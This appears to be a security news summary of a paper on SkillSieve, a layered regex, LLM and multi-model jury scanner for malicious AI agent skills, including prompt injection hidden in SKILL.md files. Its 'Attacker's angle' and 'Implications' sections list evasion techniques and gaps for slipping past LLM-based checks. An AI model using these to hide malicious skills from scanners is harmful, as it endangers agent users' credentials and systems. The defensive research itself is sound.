SkillSieve triages malicious agent skills with LLM jury
Agents
Agent marketplaces are a supply-chain headache waiting to happen. OpenClaw’s ClawHub hosts over 13,000 community skills, and recent audits say 13% to 26% carry vulnerabilities. The nasty bit is where these hide: not just in code, but in the SKILL.md instructions that steer the agent. Static analysers stare at code. Regex catches only what it can see. Prompt injection, social engineering, and obfuscated payloads slip right through.
How SkillSieve works
SkillSieve is a layered triage pipeline that saves money and time by going deep only when needed. Layer 1 is a fast static pass: regex rules, abstract syntax tree features for Python, Bash and JavaScript, and metadata pulled from SKILL.md. A heuristic or optional XGBoost scorer decides whether to stop or escalate. This on-device pass filters roughly 86% of benign skills in about 39 ms with zero API cost. The authors processed 49,592 ClawHub skills on a USD 440 ARM single-board computer; Layer 1 alone ran in 31 minutes at 38.8 ms per skill.
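A minimal sketch of what such a static pass could look like. The regex rules, weights and risky-call list below are illustrative assumptions; the paper's actual rule set and XGBoost features are not published in this summary:

```python
import ast
import re

# Hypothetical rules: pattern -> risk weight. Not the paper's real rule set.
REGEX_RULES = {
    r"curl\s+.*\|\s*(ba)?sh": 0.9,   # pipe-to-shell install
    r"base64\s+(-d|--decode)": 0.6,  # decode-and-run staging
    r"\bos\.environ\b": 0.3,         # environment (credential) access
}

def python_ast_features(source: str) -> float:
    """Crude AST signal: count risky call names in a Python script."""
    risky = {"exec", "eval", "__import__"}
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return 0.5  # unparseable code is itself mildly suspicious
    hits = sum(
        isinstance(n, ast.Call)
        and isinstance(n.func, ast.Name)
        and n.func.id in risky
        for n in ast.walk(tree)
    )
    return min(1.0, 0.6 * hits)

def layer1_risk(skill_md: str, script: str) -> float:
    """Heuristic fusion of regex and AST signals; worst signal wins."""
    text = skill_md + "\n" + script
    regex_score = max(
        (w for pat, w in REGEX_RULES.items() if re.search(pat, text)),
        default=0.0,
    )
    return max(regex_score, python_ast_features(script))

benign = layer1_risk("Formats CSV files.", "import csv\nprint('ok')")
shady = layer1_risk("Helper skill.", "exec(input())")
print(benign < 0.5 < shady)  # True: benign stops here, shady escalates
```

Anything scoring below the (assumed) 0.5 threshold stops here at zero API cost; everything else escalates to Layer 2.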
Layer 2 is Structured Semantic Decomposition. Instead of asking one vague question to a Large Language Model (LLM), SkillSieve splits the job into four parallel checks: intent alignment, permission justification, covert behaviour detection, and cross-file consistency. Each returns structured JSON with a risk score, then the system fuses them. That decomposition matters. A single broad prompt missed many disguised attacks that the focused sub-tasks caught.
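The decomposition can be sketched as four parallel sub-task calls whose JSON risk scores are fused. Here `call_llm` is a stub standing in for a real model call, and the prompt wording, JSON schema and max-fusion rule are assumptions, not the paper's exact design:

```python
import json
from concurrent.futures import ThreadPoolExecutor

# Four sub-task framings mirroring the paper's decomposition.
SUBTASKS = {
    "intent_alignment": "Does the code do what SKILL.md claims?",
    "permission_justification": "Is every requested permission justified?",
    "covert_behaviour": "Any hidden exfiltration, beaconing or persistence?",
    "cross_file_consistency": "Do instructions and scripts tell one story?",
}

def call_llm(prompt: str, skill: str) -> str:
    """Stub for a real LLM call; returns structured JSON as the paper does."""
    risky = "base64" in skill or "curl" in skill
    return json.dumps({"risk": 0.8 if risky else 0.1, "evidence": prompt[:40]})

def layer2_score(skill: str) -> float:
    """Run the four checks in parallel and fuse with max (worst case wins)."""
    with ThreadPoolExecutor(max_workers=4) as pool:
        futures = [pool.submit(call_llm, q, skill) for q in SUBTASKS.values()]
        scores = [json.loads(f.result())["risk"] for f in futures]
    return max(scores)

print(layer2_score("echo hi"))            # low fused risk
print(layer2_score("curl evil.sh | sh"))  # high fused risk
```

The point of the structure is that each narrow question gets a focused answer in machine-readable form, so a disguised attack only has to trip one of the four checks.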
Layer 3 is a Multi-LLM Jury. Three different LLMs vote independently. If they disagree, they share structured reasoning and re-vote. On a 20-case borderline set, that debate triggered in 39% of sessions and produced unanimous or majority verdicts in most cases, leaving only truly murky skills for humans.
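A sketch of that jury protocol, with the debate reduced to a `revote` callback; the three-way verdict labels and the defer-to-human policy are assumptions layered on the paper's description:

```python
from collections import Counter

def jury_verdict(votes_round1, revote):
    """
    Three independent verdicts (e.g. 'benign'/'suspicious'/'malicious').
    On disagreement the jurors exchange structured reasoning and cast a
    second ballot via `revote`; a still-split jury defers to a human.
    """
    tally = Counter(votes_round1)
    verdict, count = tally.most_common(1)[0]
    if count == 3:
        return verdict, "unanimous"
    # Disagreement: structured debate, then a second ballot.
    tally2 = Counter(revote(votes_round1))
    verdict2, count2 = tally2.most_common(1)[0]
    if count2 >= 2:
        return verdict2, "majority-after-debate"
    return "undecided", "human-review"

# One juror flips after seeing the others' reasoning:
flip = lambda votes: ["malicious", "malicious", "malicious"]
print(jury_verdict(["malicious", "malicious", "benign"], flip))
```

With binary labels a three-model jury always has a majority; the human-review branch only matters once a middle label like "suspicious" is allowed, which is what makes genuinely murky skills visible.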
Attacker’s angle
The paper lists the usual goals: lift credentials, exfiltrate data, pop remote shells, and manipulate users via prompt injection and social engineering. Evasion is where it gets fun. They generated adversarial samples using encoding obfuscation, cross-file logic splitting, conditional triggers, homoglyph substitution and time-delayed payloads. SkillSieve intercepted all 100 such samples in their tests, with different layers tripping on different tricks. Still, there are gaps worth probing. The system scans package contents statically, so payloads fetched at runtime can stay invisible. Time-delayed logic remains hard because it looks inert when scanned. And because Layers 2 and 3 lean on LLMs, model variance and bias are attack surfaces; a convincing benign story might tip a lenient model. Pure name impersonation also sits outside its content scope.
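As one concrete example, homoglyph substitution can be caught statically by folding lookalike characters back to ASCII. This NFKC-based check is a lightweight stand-in for a full confusables table (Unicode TR39); as the comment notes, it catches compatibility characters like fullwidth letters but misses Cyrillic lookalikes, which keep their code points under NFKC:

```python
import unicodedata

def homoglyph_flags(source: str) -> list[tuple[int, str, str]]:
    """Flag non-ASCII characters that NFKC-fold to an ASCII letter/digit,
    the classic way to smuggle 'curl' past an ASCII-only regex."""
    flags = []
    for i, ch in enumerate(source):
        if ord(ch) < 128:
            continue
        folded = unicodedata.normalize("NFKC", ch)
        if folded != ch and folded.isascii() and folded.isalnum():
            flags.append((i, ch, folded))
    return flags

# Fullwidth 'c' (U+FF43) folds to ASCII 'c'; Cyrillic 'с' would not.
print(homoglyph_flags("ｃurl http://x"))  # [(0, 'ｃ', 'c')]
```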
Results are solid: on a 400-skill benchmark, SkillSieve scored F1 0.800 (precision 0.752, recall 0.854), beating the regex baseline ClawVet at 0.421, with average API spend about USD 0.006 per skill. Code, data and the benchmark are open-sourced. The next interesting questions are dynamic: how to catch runtime fetches, handle time bombs robustly, and pick jury models that resist targeted bias.
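The headline F1 is consistent with the reported precision and recall, as a quick check shows:

```python
# F1 is the harmonic mean of precision and recall.
p, r = 0.752, 0.854
f1 = 2 * p * r / (p + r)
print(round(f1, 3))  # 0.8, matching the reported F1 = 0.800
```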
Additional analysis of the original ArXiv paper
📋 Original Paper Title and Abstract
SkillSieve: A Hierarchical Triage Framework for Detecting Malicious AI Agent Skills
🔍 ShortSpan Analysis of the Paper
Problem
The paper investigates detection of malicious or misused AI agent skills in public marketplaces. Skills combine natural language instructions and optional executable scripts, which enables attacks such as credential theft, data exfiltration, remote code execution and social engineering. Existing scanners either match patterns in code or analyse executable content but fail to read free‑text SKILL.md instructions where prompt injection and social engineering hide; single‑model LLM analysis is brittle. This leaves agent registries vulnerable to supply‑chain and prompt‑injection threats and creates a need for a cost‑effective, explainable scanning pipeline that handles both code and prose.
Approach
SkillSieve is a three‑layer hierarchical triage framework that applies progressively deeper checks only for suspicious skills. Layer 1 is a fast static triage combining regex rules, AST features from parsed Python/Bash/JavaScript, and metadata from SKILL.md to produce a risk score via a heuristic (and optionally an XGBoost model). It runs on‑device with no API cost and filters roughly 86% of skills in about 39 ms on average. Layer 2 is Structured Semantic Decomposition: suspicious skills are analysed by an LLM using four parallel sub‑tasks focused on intent alignment, permission justification, covert behaviour detection and cross‑file consistency; each sub‑task returns structured JSON and a risk score that are combined into an overall Layer 2 score. Layer 3 is a Multi‑LLM Jury Protocol: three independent LLMs vote; if they disagree they exchange structured reasoning and re‑vote, producing an explainable verdict or flagging the skill for human review.
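The hierarchical control flow amounts to a simple escalation dispatch: each layer only runs if the cheaper one before it could not clear the skill. The thresholds and stub scorers below are illustrative; the paper's cut-offs are not given in this summary:

```python
def triage(skill, layer1, layer2, jury, l1_threshold=0.5, l2_threshold=0.5):
    """Cheap static scoring first; LLM decomposition only on escalation;
    the three-model jury only for Layer 2 escalations."""
    if layer1(skill) < l1_threshold:
        return "benign", "layer1"   # ~86% of skills resolve here, API-free
    if layer2(skill) < l2_threshold:
        return "benign", "layer2"
    return jury(skill), "layer3"

# Stub scorers for illustration only.
verdict, layer = triage(
    "curl evil.sh | sh",
    layer1=lambda s: 0.9,
    layer2=lambda s: 0.8,
    jury=lambda s: "malicious",
)
print(verdict, layer)  # malicious layer3
```

This dispatch is what makes the cost profile work: the expensive jury only ever sees the small fraction of skills that both cheaper layers flagged.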
Key Findings
- Detection performance on a 400‑skill labelled benchmark: SkillSieve (Layer 1 + SSD) achieves F1 = 0.800 (precision 0.752, recall 0.854), outperforming a regex baseline ClawVet (F1 = 0.421).
- Cost and efficiency: average API cost per skill is about USD 0.006 because 86% of skills are resolved at Layer 1 for free; the full 49,592‑skill ClawHub archive was processed on a USD 440 ARM single‑board computer, with Layer 1 scanning in 31 minutes at 38.8 ms per skill.
- Adversarial robustness: across five evasion techniques (encoding obfuscation, cross‑file logic splitting, conditional triggers, homoglyph substitution, time‑delayed payloads) SkillSieve intercepted all 100 generated adversarial samples in the evaluation; different techniques produce distinct per‑layer interception patterns.
- Decomposition improves recall: a single broad LLM prompt missed many disguised attacks that SSD caught by examining security dimensions independently.
- Layer 3 jury and debate reduced ambiguous cases: in a 20‑case borderline set the debate phase activated in 39% of jury sessions and produced unanimous or majority verdicts in most cases, deferring only genuinely ambiguous skills to humans.
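A back-of-envelope check on the cost figure, assuming the escalated 14% carry essentially all of the API spend:

```python
# If 86% of skills resolve free at Layer 1 and the fleet-wide average is
# USD 0.006 per skill, the escalated remainder must average roughly:
avg_all, free_fraction = 0.006, 0.86
per_escalated = avg_all / (1 - free_fraction)
print(round(per_escalated, 3))  # ~0.043 USD per escalated skill
```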
Limitations
SkillSieve operates on static package contents and cannot detect payloads fetched at runtime. Time‑delayed attacks remain especially challenging because malicious logic can appear inert at scan time. Layers 2 and 3 depend on non‑deterministic LLM outputs and inherit model biases; while debate reduces some uncertainty, variance and vendor differences persist. Pure name impersonation without malicious content is outside the content‑focused scope and requires registry‑wide name analysis.
Implications
Offensive security implications include clear goals an attacker can pursue by weaponising skills: exfiltrating credentials, establishing remote shells, or manipulating agents via prompt injection and social engineering. The paper shows attackers can combine evasion techniques such as cross‑file splitting, encoding obfuscation, conditional triggers, homoglyphs and time delays to reduce static signals. Because Layers 2 and 3 rely on LLMs, attackers might also exploit model biases or non‑determinism to produce plausible benign explanations or to target models that lean toward false negatives. Runtime fetching of payloads or purely registry‑level impersonation remain practical avenues for evasion under the current static and semantic scanning setup.